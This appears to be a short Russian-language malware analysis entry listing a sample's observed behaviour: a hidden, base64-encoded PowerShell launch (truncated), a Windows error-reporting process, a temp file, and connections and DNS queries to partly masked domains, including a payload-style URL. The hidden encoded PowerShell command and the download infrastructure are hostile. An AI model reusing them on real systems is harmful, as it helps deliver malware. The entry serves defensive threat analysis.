Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABBAGkAcwB4AGoAZwBmAHAAYwBzAD0AJwBTAG0AbwBmAGsAYQBkAGgAcAAnADsAJABTAGkAYwB2AG4AeQBxAGUAYwBuAG8AIAA9ACAAJwAzADkANQAnADsAJABHAHMAdAB6AHkAaABlAGoAZAB4AHUAdAA9ACc...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1464
- %TEMP%\1243686.cvr
- 'bo##.###talbookings.info':443
- 're##fil.com':80
- 'sc###hnovin.com':443
- http://re##fil.com/lqrvboo/6634/
- 'bo##.###talbookings.info':443
- 'sc###hnovin.com':443
- DNS ASK bo##.###talbookings.info
- DNS ASK sm#####zz-afrika.com
- DNS ASK se#####tinokumus.com
- DNS ASK re##fil.com
- DNS ASK sc###hnovin.com